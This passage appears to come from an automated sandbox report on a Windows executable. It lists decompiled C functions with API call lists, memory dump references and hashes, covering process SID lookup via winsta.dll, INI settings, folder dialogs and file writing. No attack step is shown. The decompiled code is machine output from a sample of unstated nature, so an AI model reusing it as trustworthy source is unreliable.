                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                  • String ID: caption
                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                  • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                  • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                  • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                  • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                  				struct HINSTANCE__* _t11;
                                                                                                  				struct HINSTANCE__** _t14;
                                                                                                  				struct HINSTANCE__* _t15;
                                                                                                  
                                                                                                  				_t14 = __eax;
                                                                                                  				if( *((intOrPtr*)(__eax)) == 0) {
                                                                                                  					_t11 = E00405436(L"winsta.dll");
                                                                                                  					 *_t14 = _t11;
                                                                                                  					if(_t11 != 0) {
                                                                                                  						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_t15 = _t14[1];
                                                                                                  				if(_t15 == 0) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
                                                                                                  				}
                                                                                                  			}






                                                                                                  0x00409a4a
                                                                                                  0x00409a4f
                                                                                                  0x00409a56
                                                                                                  0x00409a5e
                                                                                                  0x00409a60
                                                                                                  0x00409a6e
                                                                                                  0x00409a6e
                                                                                                  0x00409a60
                                                                                                  0x00409a71
                                                                                                  0x00409a76
                                                                                                  0x00000000
                                                                                                  0x00409a78
                                                                                                  0x00000000
                                                                                                  0x00409a89

                                                                                                  APIs
                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                  • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                  • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                  • API String ID: 946536540-379566740
                                                                                                  • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                  • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                  • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                  • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                  			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                  				signed int _t21;
                                                                                                  				signed int _t23;
                                                                                                  				void* _t24;
                                                                                                  				signed int _t31;
                                                                                                  				void* _t33;
                                                                                                  				void* _t44;
                                                                                                  				signed int _t46;
                                                                                                  				void* _t48;
                                                                                                  				signed int _t51;
                                                                                                  				int _t52;
                                                                                                  				void** _t53;
                                                                                                  				void* _t58;
                                                                                                  
                                                                                                  				_t53 = __esi;
                                                                                                  				_t1 =  &(_t53[1]); // 0x0
                                                                                                  				_t51 =  *_t1;
                                                                                                  				_t21 = 0;
                                                                                                  				if(_t51 <= 0) {
                                                                                                  					L4:
                                                                                                  					_t2 =  &(_t53[2]); // 0x8
                                                                                                  					_t33 =  *_t53;
                                                                                                  					_t23 =  *_t2 + _t51;
                                                                                                  					_t46 = 8;
                                                                                                  					_t53[1] = _t23;
                                                                                                  					_t24 = _t23 * _t46;
                                                                                                  					_push( ~(0 | _t58 > 0x00000000) | _t24);
                                                                                                  					L0040B26C();
                                                                                                  					_t10 =  &(_t53[1]); // 0x0
                                                                                                  					 *_t53 = _t24;
                                                                                                  					memset(_t24, 0,  *_t10 << 3);
                                                                                                  					_t52 = _t51 << 3;
                                                                                                  					memcpy( *_t53, _t33, _t52);
                                                                                                  					if(_t33 != 0) {
                                                                                                  						_push(_t33);
                                                                                                  						L0040B272();
                                                                                                  					}
                                                                                                  					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
                                                                                                  					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
                                                                                                  				} else {
                                                                                                  					_t44 =  *__esi;
                                                                                                  					_t48 = _t44;
                                                                                                  					while( *_t48 != 0) {
                                                                                                  						_t21 = _t21 + 1;
                                                                                                  						_t48 = _t48 + 8;
                                                                                                  						_t58 = _t21 - _t51;
                                                                                                  						if(_t58 < 0) {
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							goto L4;
                                                                                                  						}
                                                                                                  						goto L7;
                                                                                                  					}
                                                                                                  					_t31 = _t21 << 3;
                                                                                                  					 *((intOrPtr*)(_t44 + _t31)) = _a4;
                                                                                                  					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
                                                                                                  				}
                                                                                                  				L7:
                                                                                                  				return 1;
                                                                                                  			}















                                                                                                  0x0040588e
                                                                                                  0x0040588f
                                                                                                  0x0040588f
                                                                                                  0x00405892
                                                                                                  0x00405896
                                                                                                  0x004058a9
                                                                                                  0x004058a9
                                                                                                  0x004058ad
                                                                                                  0x004058af
                                                                                                  0x004058b5
                                                                                                  0x004058b6
                                                                                                  0x004058b9
                                                                                                  0x004058c2
                                                                                                  0x004058c3
                                                                                                  0x004058c8
                                                                                                  0x004058d2
                                                                                                  0x004058d4
                                                                                                  0x004058d9
                                                                                                  0x004058e0
                                                                                                  0x004058ea
                                                                                                  0x004058ec
                                                                                                  0x004058ed
                                                                                                  0x004058f2
                                                                                                  0x004058f9
                                                                                                  0x00405902
                                                                                                  0x00405898
                                                                                                  0x00405898
                                                                                                  0x0040589a
                                                                                                  0x0040589c
                                                                                                  0x004058a1
                                                                                                  0x004058a2
                                                                                                  0x004058a5
                                                                                                  0x004058a7
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004058a7
                                                                                                  0x00405912
                                                                                                  0x00405915
                                                                                                  0x0040591e
                                                                                                  0x0040591e
                                                                                                  0x00405907
                                                                                                  0x0040590b

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1865533344-0
                                                                                                  • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                  • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                  • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                  • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 35%
                                                                                                  			E00409DDC(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr _a16, WCHAR* _a20) {
                                                                                                  				char _v16390;
                                                                                                  				short _v16392;
                                                                                                  				void* __edi;
                                                                                                  				intOrPtr* _t30;
                                                                                                  				intOrPtr* _t34;
                                                                                                  				signed int _t36;
                                                                                                  				signed int _t37;
                                                                                                  
                                                                                                  				_t30 = __ecx;
                                                                                                  				E0040B550(0x4004, __ecx);
                                                                                                  				_push(0x4000);
                                                                                                  				_push(0);
                                                                                                  				_v16392 = 0;
                                                                                                  				_t34 = _t30;
                                                                                                  				_push( &_v16390);
                                                                                                  				if(_a4 == 0) {
                                                                                                  					memset();
                                                                                                  					GetPrivateProfileStringW(_a8, _a12, 0x40c4e8,  &_v16392, 0x2000, _a20);
                                                                                                  					asm("sbb esi, esi");
                                                                                                  					_t37 =  ~_t36;
                                                                                                  					E004051B8( &_v16392, _t34, _a16);
                                                                                                  				} else {
                                                                                                  					memset();
                                                                                                  					E0040512F(_a16,  *_t34,  &_v16392);
                                                                                                  					_t37 = WritePrivateProfileStringW(_a8, _a12,  &_v16392, _a20);
                                                                                                  				}
                                                                                                  				return _t37;
                                                                                                  			}










                                                                                                  0x00409ddc
                                                                                                  0x00409de4
                                                                                                  0x00409df0
                                                                                                  0x00409df5
                                                                                                  0x00409df6
                                                                                                  0x00409e03
                                                                                                  0x00409e05
                                                                                                  0x00409e06
                                                                                                  0x00409e3b
                                                                                                  0x00409e5d
                                                                                                  0x00409e6a
                                                                                                  0x00409e73
                                                                                                  0x00409e75
                                                                                                  0x00409e08
                                                                                                  0x00409e08
                                                                                                  0x00409e19
                                                                                                  0x00409e37
                                                                                                  0x00409e37
                                                                                                  0x00409e81

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00409E08
                                                                                                    • Part of subcall function 0040512F: _snwprintf.MSVCRT ref: 00405174
                                                                                                    • Part of subcall function 0040512F: memcpy.MSVCRT ref: 00405184
                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409E31
                                                                                                  • memset.MSVCRT ref: 00409E3B
                                                                                                  • GetPrivateProfileStringW.KERNEL32 ref: 00409E5D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 1127616056-0
                                                                                                  • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                  • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                  • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                  • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
                                                                                                  				void* _v8;
                                                                                                  				wchar_t* _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				intOrPtr _v36;
                                                                                                  				char _v40;
                                                                                                  				long _v564;
                                                                                                  				char* _t18;
                                                                                                  				char* _t22;
                                                                                                  				wchar_t* _t23;
                                                                                                  				intOrPtr* _t24;
                                                                                                  				intOrPtr* _t26;
                                                                                                  				intOrPtr _t30;
                                                                                                  				void* _t35;
                                                                                                  				char* _t36;
                                                                                                  
                                                                                                  				_t18 =  &_v8;
                                                                                                  				_t30 = 0;
                                                                                                  				__imp__SHGetMalloc(_t18);
                                                                                                  				if(_t18 >= 0) {
                                                                                                  					_v40 = _a4;
                                                                                                  					_v28 = _a8;
                                                                                                  					_t22 =  &_v40;
                                                                                                  					_v36 = 0;
                                                                                                  					_v32 = 0;
                                                                                                  					_v24 = 4;
                                                                                                  					_v20 = E0040AC81;
                                                                                                  					_v16 = __esi;
                                                                                                  					__imp__SHBrowseForFolderW(_t22, _t35);
                                                                                                  					_t36 = _t22;
                                                                                                  					if(_t36 != 0) {
                                                                                                  						_t23 =  &_v564;
                                                                                                  						__imp__SHGetPathFromIDListW(_t36, _t23);
                                                                                                  						if(_t23 != 0) {
                                                                                                  							_t30 = 1;
                                                                                                  							wcscpy(__esi,  &_v564);
                                                                                                  						}
                                                                                                  						_t24 = _v8;
                                                                                                  						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
                                                                                                  						_t26 = _v8;
                                                                                                  						 *((intOrPtr*)( *_t26 + 8))(_t26);
                                                                                                  					}
                                                                                                  				}
                                                                                                  				return _t30;
                                                                                                  			}




















                                                                                                  0x0040ad06
                                                                                                  0x0040ad0a
                                                                                                  0x0040ad0c
                                                                                                  0x0040ad14
                                                                                                  0x0040ad19
                                                                                                  0x0040ad1f
                                                                                                  0x0040ad23
                                                                                                  0x0040ad27
                                                                                                  0x0040ad2a
                                                                                                  0x0040ad2d
                                                                                                  0x0040ad34
                                                                                                  0x0040ad3b
                                                                                                  0x0040ad3e
                                                                                                  0x0040ad44
                                                                                                  0x0040ad48
                                                                                                  0x0040ad4a
                                                                                                  0x0040ad52
                                                                                                  0x0040ad5a
                                                                                                  0x0040ad64
                                                                                                  0x0040ad65
                                                                                                  0x0040ad6b
                                                                                                  0x0040ad6c
                                                                                                  0x0040ad73
                                                                                                  0x0040ad76
                                                                                                  0x0040ad7c
                                                                                                  0x0040ad7c
                                                                                                  0x0040ad7f
                                                                                                  0x0040ad84

                                                                                                  APIs
                                                                                                  • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                  • wcscpy.MSVCRT ref: 0040AD65
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3917621476-0
                                                                                                  • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                  • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                  • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                  • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                                                                                                  				long _v8;
                                                                                                  				long _v12;
                                                                                                  				long _t13;
                                                                                                  				void* _t14;
                                                                                                  				struct HWND__* _t24;
                                                                                                  
                                                                                                  				_t24 = GetDlgItem(_a4, _a8);
                                                                                                  				_t13 = SendMessageW(_t24, 0x146, 0, 0);
                                                                                                  				_v12 = _t13;
                                                                                                  				_v8 = 0;
                                                                                                  				if(_t13 <= 0) {
                                                                                                  					L3:
                                                                                                  					_t14 = 0;
                                                                                                  				} else {
                                                                                                  					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
                                                                                                  						_v8 = _v8 + 1;
                                                                                                  						if(_v8 < _v12) {
                                                                                                  							continue;
                                                                                                  						} else {
                                                                                                  							goto L3;
                                                                                                  						}
                                                                                                  						goto L4;
                                                                                                  					}
                                                                                                  					SendMessageW(_t24, 0x14e, _v8, 0);
                                                                                                  					_t14 = 1;
                                                                                                  				}
                                                                                                  				L4:
                                                                                                  				return _t14;
                                                                                                  			}








                                                                                                  0x00404a62
                                                                                                  0x00404a6a
                                                                                                  0x00404a6e
                                                                                                  0x00404a71
                                                                                                  0x00404a74
                                                                                                  0x00404a92
                                                                                                  0x00404a92
                                                                                                  0x00404a76
                                                                                                  0x00404a76
                                                                                                  0x00404a87
                                                                                                  0x00404a90
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00404a90
                                                                                                  0x00404aa3
                                                                                                  0x00404aa7
                                                                                                  0x00404aa7
                                                                                                  0x00404a94
                                                                                                  0x00404a98

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32 ref: 00404A52
                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Item
                                                                                                  • String ID:
                                                                                                  • API String ID: 3888421826-0
                                                                                                  • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                  • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                  • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                  • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 93%
                                                                                                  			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
                                                                                                  				long _v8;
                                                                                                  				void _v8199;
                                                                                                  				char _v8200;
                                                                                                  
                                                                                                  				E0040B550(0x2004, __ecx);
                                                                                                  				_v8200 = 0;
                                                                                                  				memset( &_v8199, 0, 0x1fff);
                                                                                                  				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
                                                                                                  				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
                                                                                                  			}






                                                                                                  0x004072e0
                                                                                                  0x004072f7
                                                                                                  0x004072fd
                                                                                                  0x00407316
                                                                                                  0x00407342

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004072FD
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                  • strlen.MSVCRT ref: 00407328
                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 2754987064-0
                                                                                                  • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                  • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                  • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                  • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00408DC8(void** __eax, struct HWND__* _a4) {
                                                                                                  				int _t7;
                                                                                                  				void** _t11;
                                                                                                  
                                                                                                  				_t11 = __eax;
                                                                                                  				if( *0x4101b4 == 0) {
                                                                                                  					memcpy(0x40f5c8,  *__eax, 0x50);
                                                                                                  					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
                                                                                                  					 *0x4101b4 = 1;
                                                                                                  					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
                                                                                                  					 *0x4101b4 =  *0x4101b4 & 0x00000000;
                                                                                                  					 *0x40f2f4 = _t7;
                                                                                                  					return 1;
                                                                                                  				} else {
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  			}





                                                                                                  0x00408dd0
                                                                                                  0x00408dd2
                                                                                                  0x00408de2
                                                                                                  0x00408df4
                                                                                                  0x00408e01
                                                                                                  0x00408e1b
                                                                                                  0x00408e21
                                                                                                  0x00408e28
                                                                                                  0x00408e30
                                                                                                  0x00408dd4
                                                                                                  0x00408dd8
                                                                                                  0x00408dd8

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$DialogHandleModuleParam
                                                                                                  • String ID:
                                                                                                  • API String ID: 1386444988-0
                                                                                                  • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                  • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                                  • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                                  • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004050E1(wchar_t* __edi, wchar_t* _a4) {
                                                                                                  				int _t10;
                                                                                                  				int _t12;
                                                                                                  				void* _t23;
                                                                                                  				wchar_t* _t24;
                                                                                                  				signed int _t25;
                                                                                                  
                                                                                                  				_t24 = __edi;
                                                                                                  				_t25 = wcslen(__edi);
                                                                                                  				_t10 = wcslen(_a4);
                                                                                                  				_t23 = _t10 + _t25;
                                                                                                  				if(_t23 >= 0x3ff) {
                                                                                                  					_t12 = _t10 - _t23 + 0x3ff;
                                                                                                  					if(_t12 > 0) {
                                                                                                  						wcsncat(__edi + _t25 * 2, _a4, _t12);
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					wcscat(__edi + _t25 * 2, _a4);
                                                                                                  				}
                                                                                                  				return _t24;
                                                                                                  			}








                                                                                                  0x004050e1
                                                                                                  0x004050ec
                                                                                                  0x004050ee
                                                                                                  0x004050f5
                                                                                                  0x004050ff
                                                                                                  0x00405114
                                                                                                  0x00405118
                                                                                                  0x00405123
                                                                                                  0x00405128
                                                                                                  0x00405101
                                                                                                  0x00405109
                                                                                                  0x0040510f
                                                                                                  0x0040512e

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcslen$wcscatwcsncat
                                                                                                  • String ID:
                                                                                                  • API String ID: 291873006-0
                                                                                                  • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                  • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                                  • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                                  • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00402DDD(struct HWND__* __eax, void* __ecx) {
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				struct HWND__* _t11;
                                                                                                  				struct HWND__* _t14;
                                                                                                  				struct HWND__* _t15;
                                                                                                  				void* _t16;
                                                                                                  
                                                                                                  				_t14 = __eax;
                                                                                                  				_t16 = __ecx;
                                                                                                  				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                                  				GetClientRect(__eax, __ecx + 0xa14);
                                                                                                  				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
                                                                                                  				_t15 = GetWindow(GetWindow(_t14, 5), 0);
                                                                                                  				do {
                                                                                                  					E00402D99(_t15, _t16);
                                                                                                  					_t11 = GetWindow(_t15, 2);
                                                                                                  					_t15 = _t11;
                                                                                                  				} while (_t15 != 0);
                                                                                                  				return _t11;
                                                                                                  			}









                                                                                                  0x00402de0
                                                                                                  0x00402de2
                                                                                                  0x00402dec
                                                                                                  0x00402def
                                                                                                  0x00402dfb
                                                                                                  0x00402e0c
                                                                                                  0x00402e0e
                                                                                                  0x00402e0e
                                                                                                  0x00402e16
                                                                                                  0x00402e18
                                                                                                  0x00402e1a
                                                                                                  0x00402e21

                                                                                                  APIs
                                                                                                  • GetClientRect.USER32 ref: 00402DEF
                                                                                                  • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                  • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                    • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                                    • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Window$Rect$ClientPoints
                                                                                                  • String ID:
